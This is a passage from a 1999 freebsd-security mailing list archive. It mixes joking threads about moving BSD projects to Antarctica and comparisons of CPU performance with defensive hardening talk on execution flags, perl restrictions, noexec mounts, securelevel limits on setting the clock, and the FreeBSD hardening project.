NAA26341; Wed, 18 Aug 1999 13:15:59 -0700 (PDT) Received: from utah.XYLAN.COM by mailhub.xylan.com (SMI-8.6/SMI-SVR4 (mailhub 2.1 [HUB])) id NAA15969; Wed, 18 Aug 1999 13:09:32 -0700 Received: from softweyr.com by utah.XYLAN.COM (SMI-8.6/SMI-SVR4 (xylan utah [SPOOL])) id OAA05731; Wed, 18 Aug 1999 14:14:05 -0600 Message-ID: <37BB140D.2D5E9A02@softweyr.com> Date: Wed, 18 Aug 1999 14:14:05 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Poul-Henning Kamp Cc: marc rassbach , Brett Glass , "Jordan K. Hubbard" , James Gill , freebsd-security@FreeBSD.ORG Subject: Re: OpenBSD References: <2309.935006778@critter.freebsd.dk> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Poul-Henning Kamp wrote: > > In message <37BB0829.CFF28FCE@softweyr.com>, Wes Peters writes: > > >> I wonder what laws apply in antartica? (I'm betting that moving the *BSD > >> projects to Antiartic would get press also. To keep the natives > >> happy...we bring fishfor the penguins. :-) > > > >Not a bad idea, we'd only need one person to staff the office in order to > >make it official. The network link in is going to cost a bit though. > >Jordan, are you packing yet? I'll pony up $100 towards the cost of skis > >for your airplane. > > Antartica is a UN protectorate, you cannot setup a business there, and > I doubt they would allow us either. > > I hate to think about the cost of the T1 line too. I can probably negotiate us a good discount with Alcatel sumbmarine networks. They don't do T1, but Jordan would need at least an OC-48 anyhow, wouldn't he? -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://softweyr.com/ wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 18 13:22:57 1999 Delivered-To: freebsd-security@freebsd.org Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by hub.freebsd.org (Postfix) with ESMTP id 8292215944 for ; Wed, 18 Aug 1999 13:22:38 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.3/8.9.2) with ESMTP id WAA02448; Wed, 18 Aug 1999 22:19:10 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Wes Peters Cc: marc rassbach , Brett Glass , "Jordan K. Hubbard" , James Gill , freebsd-security@FreeBSD.ORG Subject: Re: OpenBSD In-reply-to: Your message of "Wed, 18 Aug 1999 14:14:05 MDT." <37BB140D.2D5E9A02@softweyr.com> Date: Wed, 18 Aug 1999 22:19:10 +0200 Message-ID: <2446.935007550@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <37BB140D.2D5E9A02@softweyr.com>, Wes Peters writes: >Poul-Henning Kamp wrote: >> Antartica is a UN protectorate, you cannot setup a business there, and >> I doubt they would allow us either. >> >> I hate to think about the cost of the T1 line too. > >I can probably negotiate us a good discount with Alcatel sumbmarine networks. >They don't do T1, but Jordan would need at least an OC-48 anyhow, wouldn't >he? As far as I know the 386BSD0.0 machine which runs the "jordan" AI program is only connected with a 9600 slip line :-) -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." FreeBSD -- It will take a long time before progress goes too far! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 18 13:26:11 1999 Delivered-To: freebsd-security@freebsd.org Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by hub.freebsd.org (Postfix) with ESMTP id B242B158F5 for ; Wed, 18 Aug 1999 13:25:53 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.3/8.9.2) with ESMTP id WAA02509; Wed, 18 Aug 1999 22:23:01 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: marc rassbach Cc: Narvi , Wes Peters , Brett Glass , "Jordan K. Hubbard" , James Gill , freebsd-security@FreeBSD.ORG Subject: Re: OpenBSD In-reply-to: Your message of "Wed, 18 Aug 1999 16:46:22 CDT." Date: Wed, 18 Aug 1999 22:23:01 +0200 Message-ID: <2507.935007781@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Guys, can we just can this thread now ? We're way into speculation here and you are clogging quite a number of mailboxes with it... -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." FreeBSD -- It will take a long time before progress goes too far! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 18 13:27:17 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.utexas.edu (wb3-a.mail.utexas.edu [128.83.126.138]) by hub.freebsd.org (Postfix) with SMTP id 3FFFD15B68 for ; Wed, 18 Aug 1999 13:27:09 -0700 (PDT) (envelope-from rkw@dataplex.net) Received: (qmail 13636 invoked by uid 0); 18 Aug 1999 20:27:20 -0000 Received: from dial-53-39.ots.utexas.edu (HELO nomad.dataplex.net) (128.83.57.135) by umbs-smtp-3 with SMTP; 18 Aug 1999 20:27:20 -0000 From: Richard Wackerbarth Organization: The Digital Dataplex To: freebsd-security@FreeBSD.org Subject: Re: OpenBSD Date: Wed, 18 Aug 1999 15:14:52 -0500 X-Mailer: KMail [version 1.0.21] Content-Type: text/plain References: <2309.935006778@critter.freebsd.dk> MIME-Version: 1.0 Message-Id: <99081815263304.16573@nomad.dataplex.net> Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 18 Aug 1999, Poul-Henning Kamp wrote: >In message <37BB0829.CFF28FCE@softweyr.com>, Wes Peters writes: > >>> I wonder what laws apply in antartica? (I'm betting that moving the *BSD >>> projects to Antiartic would get press also. To keep the natives >>> happy...we bring fish for the penguins. :-) >> >>Not a bad idea, we'd only need one person to staff the office in order to >>make it official. The network link in is going to cost a bit though. >>Jordan, are you packing yet? I'll pony up $100 towards the cost of skis >>for your airplane. > >Antartica is a UN protectorate, you cannot setup a business there, and >I doubt they would allow us either. But FreeBSD is already there. I know one of the "regulars" who goes there every (down under) summer. And they just posted a job opening at The University of Texas for a sysadmin. One of the requirements is that he pass the physical for Antartica. Perhaps I should apply. :-) >I hate to think about the cost of the T1 line too. Dream on..... They would jump for joy if they could get a dedicated 56k. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 18 14:30: 8 1999 Delivered-To: freebsd-security@freebsd.org Received: from shiva.eu.org (cx943344-a.fed1.sdca.home.com [24.0.167.187]) by hub.freebsd.org (Postfix) with ESMTP id 11AF114CAA; Wed, 18 Aug 1999 14:30:01 -0700 (PDT) (envelope-from bigby@shiva.eu.org) Received: from localhost (bigby@localhost) by shiva.eu.org (8.9.3/8.9.3) with ESMTP id NAA00789; Wed, 18 Aug 1999 13:30:23 -0700 (PDT) (envelope-from bigby@shiva.eu.org) Date: Wed, 18 Aug 1999 13:30:18 -0700 (PDT) From: Bigby Findrake To: "Jonathan M. Bresler" Cc: mike@argos.org, brett@lariat.org, freebsd-security@FreeBSD.ORG Subject: Re: OpenBSD In-Reply-To: <19990818201702.DC37214FF0@hub.freebsd.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 18 Aug 1999, Jonathan M. Bresler wrote: > > > > I'd sure hope so... Let's face it -- even though FreeBSD is (in my > > opinion) the most "robust" out of the bunch, the x86 architecture isn't > > going to win any awards for performance.... Cheap, yes. Easy, yes. > > Works for the most part, yes. But it's still based off of the idea that > > we need to be backwards-compatible with the late 1700's. The Alpha port > > of FBSD is A Good Thing (I'm hoping to try it out this weekend on a couple > > of the Alpha machines I have available for playing with), but the high-end > > boxes are pretty pricey. You can find multi-processor SPARC machines > > being practically given away by companies who don't know what they're > > capable of, not to mention several other platforms. > > > thisis incorrect. the intel processors knock the snot out of > sparc in inteeger performance. take a look at the hint benchmark for > example. the benchmark is in the ports tree. > > the alpha on the other hand knocks the intel flat on the matt. > > jmb Somehow I fail to notice how any of this pertains to FreeBSD security. Can someone please enlighten me or, barring that, perhaps move this conversation to a more appropriate location. /-------------------------------------------------------------------------/ "What reason weaves, by passion is undone." -- Alexander Pope finger bigby@shiva.eu.org for my pgpkey e-mail bigby@pager.shiva.eu.org to page me /-------------------------------------------------------------------------/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 18 14:30:20 1999 Delivered-To: freebsd-security@freebsd.org Received: from rapidnet.com (rapidnet.com [205.164.216.1]) by hub.freebsd.org (Postfix) with ESMTP id 3E00F14ED3 for ; Wed, 18 Aug 1999 14:30:11 -0700 (PDT) (envelope-from nick@rapidnet.com) Received: from localhost (nick@localhost) by rapidnet.com (8.9.3/8.9.3) with ESMTP id PAA54043; Wed, 18 Aug 1999 15:27:45 -0600 (MDT) Date: Wed, 18 Aug 1999 15:27:45 -0600 (MDT) From: Nick Rogness To: Wes Peters Cc: Poul-Henning Kamp , marc rassbach , Brett Glass , "Jordan K. Hubbard" , James Gill , freebsd-security@FreeBSD.ORG Subject: Re: OpenBSD In-Reply-To: <37BB140D.2D5E9A02@softweyr.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 18 Aug 1999, Wes Peters wrote: > Poul-Henning Kamp wrote: > > I can probably negotiate us a good discount with Alcatel sumbmarine networks. > They don't do T1, but Jordan would need at least an OC-48 anyhow, wouldn't > he? OC-48 is for pussies! OC-192C baby. ******************************************************************* Nick Rogness Shaw's Principle: System Administrator Build a system that even a fool RapidNet, INC can use, and only a fool will nick@rapidnet.com want to use it. ******************************************************************* To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 18 16: 4:23 1999 Delivered-To: freebsd-security@freebsd.org Received: from romeo.cnmnetwork.com (romeo.cnmnetwork.com [209.79.28.28]) by hub.freebsd.org (Postfix) with SMTP id 54C08159CD for ; Wed, 18 Aug 1999 16:04:10 -0700 (PDT) (envelope-from jrz@cnmnetwork.com) Received: (qmail 17143 invoked from network); 18 Aug 1999 16:01:35 -0700 Received: from prometheus.cnmnetwork.com (HELO cnmnetwork.com) (irc@209.79.28.5) by romeo.cnmnetwork.com with SMTP; 18 Aug 1999 16:01:35 -0700 Message-ID: <37BB3ED4.99DCB40D@cnmnetwork.com> Date: Wed, 18 Aug 1999 16:16:36 -0700 From: Jacob Zehnder X-Mailer: Mozilla 4.08 [en] (WinNT; I) MIME-Version: 1.0 To: marc rassbach Cc: Narvi , Wes Peters , Brett Glass , "Jordan K. Hubbard" , James Gill , freebsd-security@FreeBSD.ORG Subject: Re: OpenBSD References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org It would be a REALLY good idea to kill this thread ASAP :) --jacob marc rassbach wrote: > > On Wed, 18 Aug 1999, Narvi wrote: > > So what we really need is canfug (provided it exists) to take over the > > management of the main cvs server which relocates to Canada? > > Canada *MAY* not be the best place. Keep in mind OTHER legal issues > exist. Like the proposed law that would make reverese-engineering illegal > (as opposed to a licence violation) etc la. > > I'm *NOT* a legal beagle, nor do I play one on the InterNet (much anyway). > But if any kind of move is thought of, WHERE to move to should be > researched. And who knows, perhaps some up-and-comming-country would be > willing to make an place with laws that are pro-OpenSource, w/o stepping > on the rights of the closedsource world. > > And if no such place on this planet can be found, in a few years, there's > always a space station. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- -------------- Jacob Zehnder - CNM Network jrz@cnmnetwork.com +1 (805) 520-7170 http://www.cnmnetwork.com -------------- "One World, One Web, One Program" - Microsoft Promotional Ad "Ein Volk, Ein Reich, Ein Fuhrer" - Adolf Hitler To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 18 16:55:57 1999 Delivered-To: freebsd-security@freebsd.org Received: from phoenix.aye.net (phoenix.aye.net [206.185.8.134]) by hub.freebsd.org (Postfix) with SMTP id D09B115915 for ; Wed, 18 Aug 1999 16:55:45 -0700 (PDT) (envelope-from barrett@phoenix.aye.net) Received: (qmail 10878 invoked by uid 1000); 18 Aug 1999 23:48:23 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 18 Aug 1999 23:48:23 -0000 Date: Wed, 18 Aug 1999 19:48:23 -0400 (EDT) From: Barrett Richardson To: Mike Tancsa Cc: freebsd-security@freebsd.org Subject: Re: Any work around for this FreeBSD bug/DoS ? In-Reply-To: <4.1.19990817212048.0526b150@granite.sentex.ca> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 17 Aug 1999, Mike Tancsa wrote: > >I've been using a mechanism that prevents the running the arbitrary > >executables on my systems. I require a flag bit to be set for an > >executable to be run -- so if script kiddie uploads or creates > >a binary executable it wont run, unless I approve it by setting the > >flag. At the moment I let shell scripts slide which will leave you > >vunerable to perl -- but that could be easily changed. > > Interesting concept, but I guess it would get only the dumbest script > kiddies. Also, more and more exploits seem to be released on perl to make > them 'cross platform compatible'. > > ---Mike Indeed true, but not a problem. Require scripts to have the flag also, and hack perl to check for the flag for scripts passed on the command line. I currently am not implementing it this way, but have it ready to go into place should it become a problem. Additionally I put a small hack into ld-elf.so.1 so that everything gets the same level of trust as a suid executable as far as LD_LIBRARY_PATH is concerned. - Barrett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 18 17:22:36 1999 Delivered-To: freebsd-security@freebsd.org Received: from eunice.vinton.com (eunice-out.vinton.com [204.202.33.15]) by hub.freebsd.org (Postfix) with ESMTP id E212314C24 for ; Wed, 18 Aug 1999 17:22:34 -0700 (PDT) (envelope-from jrozes+935022158.3658973423@vinton.com) Received: from molloy.vinton.com (molloy.vinton.com [204.202.33.3]) by eunice.vinton.com (8.8.8/8.8.7) with ESMTP id RAA07765; Wed, 18 Aug 1999 17:22:38 -0700 (PDT) Received: (from jrozes@localhost) by molloy.vinton.com (8.8.8/8.8.8) id RAA00952; Wed, 18 Aug 1999 17:22:38 -0700 (PDT) X-Authentication-Warning: molloy.vinton.com: jrozes set sender to jrozes+935022158.3658973423@vinton.com using -f Date: Wed, 18 Aug 1999 17:22:36 -0700 (PDT) From: Jonathan Rozes Reply-To: Jonathan Rozes To: Barrett Richardson Cc: Mike Tancsa , freebsd-security@FreeBSD.ORG Subject: Re: Any work around for this FreeBSD bug/DoS ? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 18 Aug 1999, Barrett Richardson wrote: > Indeed true, but not a problem. Require scripts to have the flag also, > and hack perl to check for the flag for scripts passed on the command > line. That's not enough to 'fix' perl. You'll also need to take away from perl the ability to use the '-e' switch and the ability to read from stdin. If you want to be really pedantic, you could also force taint checking for all scripts, regardless of whether they want it or not. I started to implement something like this for OpenBSD, using the regular filesystem immutable flag on binaries, but stopped when I kept thinking of new ways for a determined attacker to bypass it. In the end, I just arranged things such that all filesystems with directories writable by non-root users were mounted noexec. > Additionally I put a small hack into ld-elf.so.1 so that everything gets > the same level of trust as a suid executable as far as LD_LIBRARY_PATH > is concerned. Why use shared libraries at all on a security-critical system? Cheers, jonathan +++ Jonathan Rozes, System Administrator, Will Vinton Studios To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 18 18:32:34 1999 Delivered-To: freebsd-security@freebsd.org Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by hub.freebsd.org (Postfix) with ESMTP id B318015926; Wed, 18 Aug 1999 18:32:26 -0700 (PDT) (envelope-from avalon@cheops.anu.edu.au) Received: (from avalon@localhost) by cheops.anu.edu.au (8.9.1/8.9.1) id LAA12008; Thu, 19 Aug 1999 11:30:57 +1000 (EST) From: Darren Reed Message-Id: <199908190130.LAA12008@cheops.anu.edu.au> Subject: Re: OpenBSD To: jmb@hub.freebsd.org (Jonathan M. Bresler) Date: Thu, 19 Aug 1999 11:30:56 +1000 (EST) Cc: mike@argos.org, brett@lariat.org, freebsd-security@FreeBSD.ORG In-Reply-To: <19990818201702.DC37214FF0@hub.freebsd.org> from "Jonathan M. Bresler" at Aug 18, 99 01:17:02 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Jonathan M. Bresler, sie said: > > > I'd sure hope so... Let's face it -- even though FreeBSD is (in my > > opinion) the most "robust" out of the bunch, the x86 architecture isn't > > going to win any awards for performance.... Cheap, yes. Easy, yes. > > Works for the most part, yes. But it's still based off of the idea that > > we need to be backwards-compatible with the late 1700's. The Alpha port > > of FBSD is A Good Thing (I'm hoping to try it out this weekend on a couple > > of the Alpha machines I have available for playing with), but the high-end > > boxes are pretty pricey. You can find multi-processor SPARC machines > > being practically given away by companies who don't know what they're > > capable of, not to mention several other platforms. > > > thisis incorrect. the intel processors knock the snot out of > sparc in inteeger performance. take a look at the hint benchmark for > example. the benchmark is in the ports tree. > > the alpha on the other hand knocks the intel flat on the matt. I see. No wonder the world has to put up with such an Intel-dominated marketplace, people can't look past the bang-for-bucks statistics. When you're running a fileserver, SPECint/SPECfp aren't really that significant. At the same time, I wouldn't be looking for a 12GB/s box if I wanted to do word processing either. Whilst your PC might be running at 100s of MHz, it probably stops hundreds of times a second, waiting for something. Talk to someone who knows about mainframes and see how often one of their CPUs will stall (for anything). They don't have FEP's, DASD, etc, for nothing. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 18 18:55:14 1999 Delivered-To: freebsd-security@freebsd.org Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id 8503415893 for ; Wed, 18 Aug 1999 18:55:12 -0700 (PDT) (envelope-from jwyatt@bsdie.rwsystems.net) Received: from bsdie.rwsystems.net([209.197.223.2]) (1421 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Wed, 18 Aug 1999 20:50:01 -0500 (CDT) (Smail-3.2.0.106 1999-Mar-31 #1 built 1999-Aug-7) Date: Wed, 18 Aug 1999 20:49:45 -0500 (CDT) From: James Wyatt To: Brett Glass Cc: Thomas Uhrfelt , James Gill , freebsd-security@FreeBSD.ORG Subject: RE: OpenBSD In-Reply-To: <4.2.0.58.19990817234258.0479b3b0@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 17 Aug 1999, Brett Glass wrote: > At 07:25 AM 8/18/99 +0200, Thomas Uhrfelt wrote: > >I for one would love to see the talented programmers/designers of OpenBSD > >merge in their excellent features into FreeBSD and join our happy familiy. > > One snag, though: OpenBSD, like NetBSD, is cross-platform and is maintained > on quite a few CPUs and machine architectures. Would FreeBSD be willing to > go that route? I would *love* to see FreeBSD run on the PPC as well. Linux runs like a bat-out-of-hell on PPC and there looks to be more OEM motherboard support soon if IBM releases their MB designs (as they are discussing doing). When I get my Aplha back, the NT/Linux image is going away for FreeBSD/Alpha! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 18 19:52:55 1999 Delivered-To: freebsd-security@freebsd.org Received: from phoenix.aye.net (phoenix.aye.net [206.185.8.134]) by hub.freebsd.org (Postfix) with SMTP id ADD651595D for ; Wed, 18 Aug 1999 19:52:49 -0700 (PDT) (envelope-from barrett@phoenix.aye.net) Received: (qmail 20264 invoked by uid 1000); 19 Aug 1999 02:44:40 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 19 Aug 1999 02:44:40 -0000 Date: Wed, 18 Aug 1999 22:44:39 -0400 (EDT) From: Barrett Richardson To: Jonathan Rozes Cc: Mike Tancsa , freebsd-security@FreeBSD.ORG Subject: Re: Any work around for this FreeBSD bug/DoS ? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 18 Aug 1999, Jonathan Rozes wrote: > On Wed, 18 Aug 1999, Barrett Richardson wrote: > > > That's not enough to 'fix' perl. You'll also need to take away from perl > the ability to use the '-e' switch and the ability to read from stdin. If > you want to be really pedantic, you could also force taint checking for > all scripts, regardless of whether they want it or not. Thanks for the info. This is useful. > > I started to implement something like this for OpenBSD, using the regular > filesystem immutable flag on binaries, but stopped when I kept thinking of > new ways for a determined attacker to bypass it. In the end, I just Good point. The motivation for such a scheme is that it foils the script kiddies that just use *canned* exploits, which in my case includes *all* of my attackers. If an imperfect model keeps them at bay even though the model is imperfect, it helps out. Back to the original argument of the code that was posted, script kiddie wannabes cant run it on my system unless I approve it (and I dont plan on approving it) or they have to engineer a means to do the same themselves (not typical script kiddie behaviour). The script kiddie has to work harder -- which is the goal of most any security scheme -- decreasing the fruits of labor for the attacker by increasing their resource expenditure. There is probably a way to run some arbitrary code with a mmap or function pointer hook in some software, but script kiddies for the most part aren't at that skill level yet. True that someday the scheme will be completely useless (FreeBSD 2.0.5 was once "secure"), but if it can save me a panic or two (or a breach) in the meantime the time it took to patch the kernel and set the flag on binaries was well spent. It's kind of a kludge, but it's not completely useless. > arranged things such that all filesystems with directories writable by > non-root users were mounted noexec. > > > Additionally I put a small hack into ld-elf.so.1 so that everything gets > > the same level of trust as a suid executable as far as LD_LIBRARY_PATH > > is concerned. > > Why use shared libraries at all on a security-critical system? Another good point. The motivation here is when I don't need espionage level security I get some extra insurance at low cost. - Barrett > > Cheers, > jonathan > > +++ Jonathan Rozes, System Administrator, Will Vinton Studios > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 19 0:32:49 1999 Delivered-To: freebsd-security@freebsd.org Received: from bifrost.infologigruppen.se (ns2.infologigruppen.se [212.214.163.69]) by hub.freebsd.org (Postfix) with ESMTP id 3A3F414E9B for ; Thu, 19 Aug 1999 00:32:41 -0700 (PDT) (envelope-from Goran.Lowkrantz@infologigruppen.se) Received: (from uucp@localhost) by bifrost.infologigruppen.se (8.9.2/8.8.8) id WAA14181 for ; Wed, 18 Aug 1999 22:02:44 +0200 (CEST) (envelope-from Goran.Lowkrantz@infologigruppen.se) Received: from valhall.ign.se(192.168.3.1) via SMTP by bifrost-net.ign.se, id smtpdp14179; Wed Aug 18 22:02:38 1999 Received: by valhall.ign.se with Internet Mail Service (5.5.2448.0) id ; Wed, 18 Aug 1999 21:55:03 +0200 Message-ID: From: "Lowkrantz, Goran" To: "'freebsd-security@FreeBSD.ORG'" Subject: Securelevel 3 ant setting time Date: Wed, 18 Aug 1999 21:54:53 +0200 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2448.0) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, Just found that I can't correct the time on my firewall, running at security level 3. When I try I get the following: date: settimeofday (timeval): Operation not permitted Is this by design? If so, why? Cheers, Goran L To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 19 9:29:23 1999 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 39FFD14EA4 for ; Thu, 19 Aug 1999 09:29:18 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id MAA21800; Thu, 19 Aug 1999 12:27:53 -0400 (EDT) (envelope-from robert@cyrus.watson.org) Date: Thu, 19 Aug 1999 12:27:53 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: "Mikhail A. Sokolov" Cc: Tom Brown , "'freebsd-security@freebsd.org'" Subject: Re: "Secure-FreeBSD" Idea In-Reply-To: <19990813031813.A94114@demos.su> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 13 Aug 1999, Mikhail A. Sokolov wrote: > On Thu, Aug 12, 1999 at 09:52:48AM -0700, Tom Brown wrote: > # HI, > # > # Now realistically all this would have to be is a really anal installation process, forcing the user to positively select services such as ftp,telnet, sendmail etc. So if you don't select anything, you can't much. It would also have carefully set UMASKS and probably come with some easy way to get the user to set-up tripwire and ipfw for example. > # > # I suspect that most of the readers of this list spend a fair amount of time going through the same laborious process of tying down each server they built. How about we pools this vast collection of procedures together and try to build some kind of a security release. We all know (well at least I hope we do!) what a solid O/S FreeBSD is, wouldn't this be the ideal opportunity, to push the OS further into the public eye? > > Robert Watson has some tools, which are supposed to be bringing standard > system install to somewhat more secure state, it was under the idea > of 'the freebsd hardening project'. I guess he reads this list and could > comment, actually. I'm currently on vacation several hundred miles from my development tree, but will be back in town next week and continuing work on the POSIX.1e extensions, primarily auditing at this point. The hardening project suffers from a lack of time on my part, and no doubt others also. Jan's HOW-TO is a useful tool for those wanting to harden a system--creating a software tool to manage his instructions for you (i.e., check the boxes to apply the restrictions he describes, with online help from the howto) would be great if someone wants to hack one up. Continued work to reduce setuid/setgid utilities and move away from /dev/kmem are always good things to do, also. I hope to be releasing some more auditing code in about a month or so, which include some IDS code that might be useful. Anyhow, I'm back off to vacationing, but will not doubt have some comments concerning the dozens of other -security mails that seem to have arrived over the past week :-). Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Computing Laboratory at Cambridge University Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 19 9:59:26 1999 Delivered-To: freebsd-security@freebsd.org Received: from sf1-smtp01.hamquist.com (sf1-smtp01.hamquist.com [199.108.89.4]) by hub.freebsd.org (Postfix) with SMTP id 76D551511C for ; Thu, 19 Aug 1999 09:59:24 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from 10.40.251.222 by sf1-smtp01.hamquist.com with ESMTP ( WorldSecure Server SMTP Relay(WSS) v3.6); Thu, 19 Aug 99 09:59:20 -0700 X-Server-Uuid: c29e0ff2-e8b9-11d1-a493-00c04fbbd7d3 Received: by sf1-mail03 with Internet Mail Service (5.5.2448.0) id ; Thu, 19 Aug 1999 09:59:19 -0700 Message-ID: From: "Childers, Richard" To: "'marc rassbach '" , "'Narvi '" Cc: "'Wes Peters '" , "'Brett Glass '" , "'Jordan K. Hubbard '" , "'James Gill '" , "'freebsd-security@FreeBSD.ORG '" Subject: RE: OpenBSD Date: Thu, 19 Aug 1999 09:59:17 -0700 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2448.0) X-WSS-ID: 1BA2E86D675612-01-02 Content-Type: text/plain; charset=windows-1252 Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "... if any kind of move is thought of, WHERE to move to should be researched." This would be an interesting niche for an enterprising data haven on an abandoned oil derrick or anchored freighter; source tree host ... "And if no such place on this planet can be found, in a few years, there's always a space station." Or a satellite; there are are several amateur radio satellites in orbit, several of them operate on 2 meters or 10 meters (they act as store and forward packet digipeaters) ... and I've been noticing that web servers have been getting pretty small, physically speaking ... (-; -- richard Richard Childers Senior UNIX Systems Administrator Hambrecht & Quist, LLC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 19 11:21: 3 1999 Delivered-To: freebsd-security@freebsd.org Received: from bubba.whistle.com (bubba.whistle.com [207.76.205.7]) by hub.freebsd.org (Postfix) with ESMTP id 88EB514C18 for ; Thu, 19 Aug 1999 11:20:58 -0700 (PDT) (envelope-from archie@whistle.com) Received: (from archie@localhost) by bubba.whistle.com (8.9.2/8.9.2) id LAA94866; Thu, 19 Aug 1999 11:19:18 -0700 (PDT) From: Archie Cobbs Message-Id: <199908191819.LAA94866@bubba.whistle.com> Subject: Re: Securelevel 3 ant setting time In-Reply-To: from "Lowkrantz, 